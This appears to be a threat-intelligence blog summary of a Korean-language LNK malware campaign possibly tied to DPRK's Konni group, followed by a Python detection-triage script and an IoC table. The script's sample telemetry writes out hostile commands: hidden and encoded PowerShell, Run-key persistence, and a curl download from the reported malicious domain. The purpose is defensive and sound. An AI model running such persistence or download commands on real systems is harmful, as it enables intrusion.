A Deep Dive Into a Multi-Stage Malware Campaign Potentially Linked to DPRK’s Konni Group

2025-04-23 navneet

https://muff-in.github.io/blog/Malware-Campaign-Potentially-Linked-to-DPRK-Konni-Group/


A suspicious ZIP archive delivered a Korean-named LNK file disguised as a PDF proposal, and the source assesses its TTPs as similar to prior operations linked to DPRK's Konni group. The infection chain uses a double-extension LNK with a PDF icon to run obfuscated PowerShell, carve embedded content from the LNK, decrypt payloads with XOR, display a decoy proposal PDF, and unpack a CAB into the public Documents directory. The decoy includes a KakaoTalk Open Chat link themed around Naver and Coupang online-store marketing, suggesting social engineering aimed at Korean-speaking users. Later stages run start.vbs and batch files for persistence via HKCU Run, download a password-protected ZIP from ausbildungsbuddy.de, and continue execution through additional scripts. The campaign is notable for combining Korean-language lure material, multi-stage script execution, cleanup, and potentially compromised infrastructure in a flow the author links cautiously to Konni-style DPRK activity.
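The chain summarised above (PDF-disguised double-extension LNK, hidden or encoded PowerShell, CAB unpacked into the public Documents directory, start.vbs registered under HKCU Run, download from the reported domain) maps cleanly onto process-creation telemetry. The following triage script is an added example and not code from the original report: it scores Sysmon-style process-creation records against those behaviours. The record layout, the field names, every command line and file name are constructed for the demonstration; only the two domains are taken from the IoC list on this page.

```python
"""
Added triage example (not from the original report): score constructed
process-creation records for the behaviours described in the summary.
Field names, sample command lines and file names are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed layout, Sysmon EID 1-like)."""
    parent_image: str
    image: str
    command_line: str


# Domains from this page's IoC list; everything else in the samples is constructed.
REPORTED_DOMAINS = ("ausbildungsbuddy.de", "jmarketing.agency")

# One heuristic per behaviour named in the summary.
DOUBLE_EXT_LNK = re.compile(r"\.(?:pdf|docx?|hwp|xlsx?)\.lnk\b", re.I)
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
HIDDEN_PS = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I)
HKCU_RUN = re.compile(r"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b", re.I)
PUBLIC_DOCS_SCRIPT = re.compile(r'\\Users\\Public\\Documents\\[^\s"]+\.(?:vbs|bat|cmd|ps1)\b', re.I)
CAB_EXPAND = re.compile(r"\bexpand(?:\.exe)?\s+.*\.cab\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> List[str]:
    """Return the labels of every heuristic that fires on one event, in a fixed order."""
    cl = ev.command_line
    img = basename(ev.image)
    findings: List[str] = []
    if DOUBLE_EXT_LNK.search(cl):
        findings.append("double_extension_lnk")
    if img in ("powershell.exe", "pwsh.exe"):
        if ENCODED_PS.search(cl):
            findings.append("encoded_powershell")
        if HIDDEN_PS.search(cl):
            findings.append("hidden_window_powershell")
    # Only a Run-key *write* is persistence; 'reg query' against the same key is benign.
    if img == "reg.exe" and HKCU_RUN.search(cl) and re.search(r"\badd\b", cl, re.I):
        findings.append("hkcu_run_persistence")
    if PUBLIC_DOCS_SCRIPT.search(cl):
        findings.append("script_in_public_documents")
    if CAB_EXPAND.search(cl):
        findings.append("cab_extraction")
    if any(d in cl.lower() for d in REPORTED_DOMAINS):
        findings.append("reported_domain_contact")
    return findings


def triage(events: List[ProcEvent]) -> List[Tuple[int, str, List[str]]]:
    """(index, image name, findings) for every event with at least one finding."""
    hits = []
    for i, ev in enumerate(events):
        f = score_event(ev)
        if f:
            hits.append((i, basename(ev.image), f))
    return hits


# Constructed sample telemetry: events 0-4 mimic the described chain, 5-6 are benign noise.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
              r"$b=[IO.File]::ReadAllBytes($env:USERPROFILE+'\Downloads\Proposal.pdf.lnk')"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\expand.exe",
              r"expand.exe C:\Users\Public\Documents\pkg.cab -F:* C:\Users\Public\Documents\ "),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpdate '
              r'/t REG_SZ /d "wscript.exe C:\Users\Public\Documents\start.vbs" /f'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe -s -o C:\Users\Public\Documents\update.zip https://ausbildungsbuddy.de/"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoP -W Hidden -Enc U3RhcnQtU2xlZXAgLVNlY29uZHMgMw=="),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\user\Documents"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r"reg.exe query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"),
]

if __name__ == "__main__":
    for idx, image, labels in triage(SAMPLE_EVENTS):
        print(f"event {idx} ({image}): {', '.join(labels)}")
```

Each heuristic is deliberately narrow (a Run-key write rather than any Run-key access, a hidden-window or encoded switch rather than any PowerShell launch) so that the benign events 5 and 6 score zero; in a real SIEM the value comes from correlating several of these labels within one process tree or a short time window rather than alerting on any single one.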

Indicators of Compromise

Type    Value                                First Seen   Last Seen
URL     https://ausbildungsbuddy.de/mod…     2025-04-23   2025-05-19
URL     https://ausbildungsbuddy.de/mod…     2025-04-23   2025-05-19
URL     https://ausbildungsbuddy.de/mod…     2025-04-23   2025-05-19
DOMAIN  ausbildungsbuddy.de                  2025-04-23   2025-05-19
HASH    627ee714b1e4f5bd692061e1c297831…     2025-04-23   2025-04-23
URL     https://ausbildungsbuddy.de/         2025-04-23   2025-04-23
URL     https://jmarketing.agency/           2025-04-23   2025-04-23
DOMAIN  jmarketing.agency                    2025-04-23   2025-04-23
DOMAIN  fromausbildungsbuddy.de              2025-04-23   2025-04-23
